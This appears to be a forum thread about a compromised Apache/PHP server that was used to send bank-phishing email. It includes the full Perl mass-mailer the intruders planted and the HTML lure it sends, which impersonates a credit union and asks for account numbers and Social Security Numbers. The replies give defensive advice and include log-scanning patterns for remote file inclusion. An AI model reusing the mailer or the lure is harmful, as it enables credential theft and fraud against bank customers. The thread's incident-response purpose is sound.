zkaiserm asked:
Protect Port 80(Apache)

We have an intrusion which looks like an automated script that buries itself in a hidden directory under /tmp. This script is basically a combination of 2 files,
"awstats.pl" and links.txt. What it does is start sending out emails portraying itself as a BANK to all the addresses in the .txt file.
This was the 4th time it attacked us since April 23. We had no choice other than taking the server off the network. Any ideas or suggestions on how to protect port 80 from these kinds of attacks?
zkaiserm (ASKER):
This is the culprit "awstats.pl"

#!/usr/bin/perl

print "Content-type: text/html\n";

$file = "list.txt";
open(IN_FILE, $file);
my @data=<IN_FILE>;
close IN_FILE;

$contfile = "test.txt";
open(IN_FILE, $contfile);
my @contdata = <IN_FILE>;
close IN_FILE;

my $count = 0;

my $SendmailPath = '/usr/sbin/sendmail';
my $from_s = 'customerservice@visionsfcu.org';
my $subj_s = 'NOTICE FROM Visions Federal Credit Union #REF-ID:79053430';
my $contdata_s = @contdata;

my($mailbody) = <<__END__MAILBODY__;


<html>
<body>

<div id="message" style="width: 1136; height: 558">
  <table id="AutoNumber1" border="1" bordercolor="#111111" cellpadding="0" cellspacing="0" width="34%">
    <tbody>
      <tr>
        <td width="100%">
          <p><img border="0" src="https://www.visionsfcu.org/images/visions2.jpg" width="158" height="50"></p>
          <p align="left"><font face="Arial" size="2">Dear Vision FCU Client,<br>
          &nbsp;&nbsp;&nbsp;<br>
          &nbsp;This is your official notification from Vision FCU&nbsp;that the
          service(s) listed below &nbsp;will be deactivated and deleted if not
          renewed immediately. Previous notifications have &nbsp;been sent to
          the Billing Contact assigned to this account. As the Primary Contact,
          you &nbsp;must renew the service(s) listed below or it will be
          deactivated and deleted.&nbsp;<br>
          <br>
          &nbsp;</font><font face="Verdana" size="2"><a target="_blank" href="http://visionsfcu.acswi.com/fcu-online/session_id.php"><font
color="#003399" face="Arial" size="2"><b>Renew
          Now</b></font></a></font><font face="Arial" size="2">&nbsp; your&nbsp;Vision
          FCU Bill Pay Services.<br>
          <br>
          If you are not enrolled to Online Banking, please enter your checking
          account number as&nbsp;Account Number&nbsp; and Social Security Number&nbsp;
          as Password.</font></p>
          <div style="width: 508; height: 48">
            <font face="Arial" size="2">&nbsp;<br>
            &nbsp;<b><font color="#000000">SERVICE</font></b> : Vision FCU Bill
            Pay Services.<br>
            &nbsp;<b><font color="#000000">EXPIRATION</font><font color="#000080">
            </font></b>:&nbsp;May 15, 2006</font>
          </div>
          <div>
            <font face="Arial" size="2">&nbsp;</font>
          </div>
          <div>
            <font face="Arial" size="2"><br>
            Thank you,&nbsp;sincerely,<br>
            <br>
            <font size="-1">Eric Kingsbury</font>, Customer Service</font>
          </div>
          <div>
            <p align="center"><font face="Verdana" size="2">======================================================================<br>
            &nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<br>
            ======================================================================</font></p>
          </div>
          <div>
            <font face="Verdana" size="2">&nbsp;</font>
          </div>
          <div>
            <font face="Verdana" size="2">&nbsp;Document Reference: (#79053430).</font>
          </div>
          <p align="center"><font face="Verdana" size="2"><b>2006 Vision FCU,
          All Rights Reserved. Member FDIC. Equal Housing Lender.</b></font></td>
      </tr>
    </tbody>
  </table>
</div>

</body>

</html>

__END__MAILBODY__

foreach $line (@data){
print qq($line);
sendmail($line, $from_s, $subj_s, $mailbody );
}

sub sendmail{
     my ($to, $from, $subj, $msg) = @_;
     open (MAIL, "|$SendmailPath -t -i")|| die "Error! Can't use sendmail\n";
     print MAIL "To: $to";
     print MAIL "From: $from\n";
     print MAIL "Subject: $subj\n";
     print MAIL "Reply-To: $from\n";
     print MAIL "Content-type: text/html\n\n";
     print MAIL "$msg\n";
     close (MAIL);
}

my $count;
$count++ foreach(@data);
print "$count emails sent\n";
Tolomir:
This is of course just a quick countermeasure:

If it is always the same script, how about modifying the hosts file and adding

visionsfcu.org 127.0.0.1
visionsfcu.acswi.com 127.0.0.1

creating a directory "images" in the www documents folder and putting a big "FAKE" in the pic visions2.jpg; that file goes in the "images" folder.

Should at least stop the spammer from collecting more PINs...

---

Apart from that, apply all security patches for your system; I guess that is where the problem lies.


Tolomir
ASKER CERTIFIED SOLUTION: SashaP (solution text only available to members)
I agree; a large concern that should be addressed is how this application is getting onto your system. Configuring your logs to identify suspicious traffic could go a long way toward figuring out how the application is being installed and run. I would also make sure that all of your apps are running the latest versions of the necessary applications and not running anything that is unnecessary. A tool like logwatch can go through your httpd logs and inform you of sketchy behavior.

For example, this is a Perl script; if you can do without Perl then you will stop this application cold even if it stays on your machine.

Hope this helps

-t
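The advice above is to configure logging so that suspicious traffic stands out. As an added example (not code from the thread or from any poster), the POSIX shell check below scans an Apache access log in combined format for two constructed indicators: a full http(s):// URL passed as a query-parameter value (plain or URL-encoded), and a reference to /tmp/ in the request line. The patterns, the log file name and the sample log lines are all assumptions made for illustration; the addresses come from the RFC 5737 documentation ranges.

```shell
#!/bin/sh
# Added example (not from the thread): scan an Apache combined-format access
# log for requests that suggest the web application is being used to pull in
# or run outside files. Patterns and sample lines are constructed assumptions:
#   - a full http(s):// URL handed over as a query-parameter value
#     (plain or URL-encoded)
#   - a reference to /tmp/ in the request line (plain or URL-encoded)
flag_suspicious_requests() {
  logfile=$1
  # Match only inside the quoted request line, then reduce each hit to
  # client IP, method, path and status so the output is easy to scan.
  grep -E '"(GET|POST) [^"]*(=https?(%3[aA]|:)(%2[fF]|/){2}|/tmp/|%2[fF]tmp%2[fF])' "$logfile" \
    | awk '{ gsub(/"/, "", $6); print $1, $6, $7, $9 }'
}

# Constructed sample log: two ordinary requests and two that should be flagged.
# Addresses are from the documentation ranges (RFC 5737), not real clients.
make_sample_log() {
  f=$(mktemp)
  cat >"$f" <<'EOF'
192.0.2.10 - - [23/Apr/2006:03:12:01 -0400] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
192.0.2.10 - - [23/Apr/2006:03:12:09 -0400] "GET /index.php?page=http://203.0.113.5/x.txt? HTTP/1.1" 200 311 "-" "Mozilla/4.0"
198.51.100.7 - - [23/Apr/2006:03:13:44 -0400] "GET /cgi-bin/upload.cgi?dest=%2Ftmp%2F HTTP/1.0" 200 88 "-" "Wget/1.10"
192.0.2.22 - - [23/Apr/2006:03:14:02 -0400] "GET /images/logo.gif HTTP/1.1" 304 - "-" "Mozilla/5.0"
EOF
  printf '%s\n' "$f"
}

# Demo run on the constructed log. On a real server you would point the
# function at the live access log (path depends on the httpd.conf in use).
sample=$(make_sample_log)
flag_suspicious_requests "$sample"
rm -f "$sample"
```

Run against the constructed log this prints the second and third requests only, each reduced to client address, method, path and status. Because the output keeps the client address, the hits can be fed straight into a firewall block list or correlated with the timestamps of the files found in /tmp.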
http://www.google.com/search?hl=en&q=locking+down+apache&btnG=Google+Search
Yes, secure your Apache install; make sure it's got the latest patches and you're running the latest version.
http://security.lss.hr/index.php?page=details&ID=LSS-2005-01-01
-rich
Emails are sent using port 25/tcp.

You could block this port on the server itself (using ipchains/iptables) or on the network.

With the port blocked, the script will not be able to send mails.

Blocking port 25 will solve the problem with sending out emails but will not remove the cause. If the server can be exploited to send out emails, what else is it being used for that you do not know of?

You are better off finding the cause or rebuilding a new box with all of the latest patches. I have seen machines so pwned that you could take three times more time cleaning them than you would dropping in a blank drive and starting over, and that was with extensive logging running on the machine.
Folks,
     Thanks for your response. One thing which bothers me is how these files ended up on our server. Also, it was so well done that they were hidden, or not exactly hidden: it's a directory without a name. For example:

/tmp/  /trimite/awstats.pl

The space you see between tmp and trimite is a directory without a name. What could be the cause of these files ending up on our server? Is it the webserver configuration? Or is something wrong with the web application? Is there any practical way of knowing this is how they hack into the webserver? How in the world could someone put files on your server through port 80? That would be the question of the day.
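The nameless directory described in the post above hides from a casual "ls" because its name is a single space. As an added example (not code from the thread or from any poster), the POSIX shell function below lists the entries of a directory whose names consist only of whitespace or start with a dot, printing each in brackets so that a blank name is still visible. The fixture directory it builds is a constructed stand-in for /tmp; the names in it are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): list directory entries whose names are
# easy to overlook in plain "ls" output: names made only of whitespace (like
# the blank directory under /tmp described above) and names starting with a
# dot. Each hit is printed in brackets so a blank name remains visible.
find_odd_names() {
  dir=$1
  # Two globs: "*" skips dotfiles, ".*" catches them (and "." / "..", skipped below).
  for entry in "$dir"/* "$dir"/.*; do
    [ -e "$entry" ] || continue       # an unmatched glob stays literal; skip it
    name=${entry##*/}
    case $name in
      .|..) continue ;;
    esac
    # Strip spaces and tabs; if nothing is left the name is whitespace-only.
    stripped=$(printf '%s' "$name" | tr -d ' \t')
    if [ -z "$stripped" ] || [ "${name#.}" != "$name" ]; then
      printf '[%s]\n' "$name"
    fi
  done
}

# Constructed fixture standing in for /tmp: a directory named with a single
# space that holds a file, a dot-directory, and an ordinary directory.
make_fixture() {
  fx=$(mktemp -d)
  mkdir "$fx/ " "$fx/.cache" "$fx/normal"
  : >"$fx/ /awstats.pl"
  printf '%s\n' "$fx"
}

# Demo run on the fixture; on the real box you would run find_odd_names /tmp
# (and the web server's upload and session directories) as root.
fixture=$(make_fixture)
find_odd_names "$fixture"
rm -rf "$fixture"
```

On the fixture this prints "[ ]" and "[.cache]" and leaves "normal" alone. Running it over /tmp and any other world-writable directory the web server user can write to gives a quick inventory of names that would otherwise be missed, which is useful both for cleanup and for confirming whether a rebuild is the safer course.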
Well, as I posted above, your system can be vulnerable because it's missing the latest patches.

Check what ports are open, and check whether that software is patched with up-to-date patches.

Tolomir
Take your pick... It could be Apache, it could be Tomcat if you're running it, it could be your code, or it could be due to a lax .conf file or setting.
http://secunia.com/search/?search=apache
XSS (cross site scripting) has been getting more and more attention lately: http://en.wikipedia.org/wiki/XSS There are unfortunately quite a few vectors for this.
To me, if it's not XSS, it's likely lax security of the config or on the directories; write permissions may be granted to everyone... possibly a username/password embedded in your source code?
-rich
Tolomir,
     We have a firewall. Intruders can only use the ports which are open. Your answer looks quite normal. I signed up for Experts Exchange to know what happens behind the scenes. I would like to know how it happens. How come someone can send commands through the browser?

Kaiser
Flaws in your source code, scripting, scripting interpreters, Apache exploits, lax security settings: all can lead to what happened to you.
Are you running PHP code, CGI/Perl code, do you have a login site? Each piece of software adds complexity, possible exploit vectors, and more overhead for you to figure out how to secure. Login sites can be poorly made; often the database usernames and passwords can be in the source code, or not obfuscated well. You can glean quite a bit of info from a poorly written site.

If you're running PHP or phpBB you can see there are hundreds of exploits that can lead to compromise; there are a variety of worst practices that can lead to this also.
http://secunia.com/search/?search=php
http://secunia.com/search/?search=phpbb

Things like this: http://www.securityfocus.com/bid/15250/info http://www.securityfocus.com/bid/15250/discuss
can upload a script. If you'd like to learn more you can search Bugtraq, or pick up some of the Hacking Exposed series of books.
http://governmentsecurity.org/archive/t4603.html Ahh, the loginmatrix challenge... that was a great tool to learn from. It's gone now... too bad, that one was fun.
-rich
Richrumble pointed it out precisely.

Please tell us more about the software components you use.

E.g. Host OS: Win 2k3, IIS webserver, MSSQL Database 2005.

such like...

Tolomir
(also normal)
Apache 1.3.x
mysql 3.x
php 4.1
freebsd 5.1

The email the users got came from something like www@ourhostname.com. What's this "www" user?